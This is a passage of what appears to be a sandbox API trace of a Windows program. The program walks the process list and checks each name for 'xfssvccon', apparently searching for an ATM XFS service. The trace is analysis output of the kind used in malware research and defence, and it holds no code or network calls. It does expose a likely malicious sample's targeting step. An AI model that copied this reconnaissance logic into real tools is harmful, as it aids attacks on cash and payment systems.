lpMultiByteStr=0x3569ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0094.057] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0094.057] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="xfssvccon") returned 0x0 [0094.057] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0094.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.058] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a350 [0094.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x356a350, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0094.058] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0094.058] StrStrIA (lpFirst="omnipos.exe", lpSrch="xfssvccon") returned 0x0 [0094.058] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0094.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.060] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569d08 [0094.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3569d08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0094.060] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0094.060] StrStrIA (lpFirst="spcwin.exe", lpSrch="xfssvccon") returned 0x0 [0094.060] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0094.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.061] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3569b08 [0094.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3569b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0094.061] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0094.061] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="xfssvccon") returned 0x0 [0094.061] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0094.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.063] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3569cc0 [0094.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3569cc0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0094.063] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0094.063] StrStrIA (lpFirst="utg2.exe", lpSrch="xfssvccon") returned 0x0 [0094.063] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0094.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.064] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569e88 [0094.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3569e88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0094.064] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0094.064] StrStrIA (lpFirst="saying.exe", lpSrch="xfssvccon") returned 0x0 [0094.064] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0094.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.067] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3569df8 [0094.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3569df8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0094.067] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0094.067] StrStrIA (lpFirst="ripe.exe", lpSrch="xfssvccon") returned 0x0 [0094.067] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0094.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.069] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569c90 [0094.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3569c90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0094.069] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0094.069] StrStrIA (lpFirst="acoustic.exe", lpSrch="xfssvccon") returned 0x0 [0094.069] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0094.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0094.070] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3569f00 [0094.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3569f00, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0094.070] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0094.070] StrStrIA (lpFirst="mail.exe", lpSrch="xfssvccon") returned 0x0 [0094.070] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.071] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569d50 [0094.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3569d50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.071] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.071] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="xfssvccon") returned 0x0 [0094.071] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.073] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569cf0 [0094.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569cf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.073] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.073] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0094.073] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0094.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.074] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569d20 [0094.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569d20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.074] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0094.074] StrStrIA (lpFirst="dllhost.exe", lpSrch="xfssvccon") returned 0x0 [0094.074] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.075] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3569ea0 [0094.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3569ea0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.075] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.075] StrStrIA (lpFirst="taskhostw.exe", lpSrch="xfssvccon") returned 0x0 [0094.076] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0094.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.082] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3569d98 [0094.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3569d98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0094.082] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0094.082] StrStrIA (lpFirst="UsoClient.exe", lpSrch="xfssvccon") returned 0x0 [0094.082] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.083] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3569e70 [0094.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3569e70, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.083] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.083] StrStrIA (lpFirst="taskhostw.exe", lpSrch="xfssvccon") returned 0x0 [0094.083] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0094.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0094.085] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3569928 [0094.085] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3569928, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0094.085] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0094.085] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="xfssvccon") returned 0x0 [0094.085] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0094.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.086] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569b28 [0094.086] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3569b28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0094.086] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0094.086] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="xfssvccon") returned 0x0 [0094.086] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0094.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0094.087] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356a498 [0094.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x356a498, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0094.088] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0094.088] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="xfssvccon") returned 0x0 [0094.088] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.089] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569eb8 [0094.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569eb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.089] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.089] StrStrIA (lpFirst="conhost.exe", lpSrch="xfssvccon") returned 0x0 [0094.089] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0094.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.090] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569ed0 [0094.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3569ed0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.090] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0094.090] StrStrIA (lpFirst="conhost.exe", lpSrch="xfssvccon") returned 0x0 [0094.090] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.091] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569ee8 [0094.091] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569ee8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.091] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.091] StrStrIA (lpFirst="svchost.exe", lpSrch="xfssvccon") returned 0x0 [0094.091] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0094.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.093] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569d80 [0094.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3569d80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0094.093] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0094.093] StrStrIA (lpFirst="rxodge.exe", lpSrch="xfssvccon") returned 0x0 [0094.093] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0094.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.094] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3569c78 [0094.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3569c78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0094.094] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0094.094] StrStrIA (lpFirst="sppsvc.exe", lpSrch="xfssvccon") returned 0x0 [0094.094] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0094.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 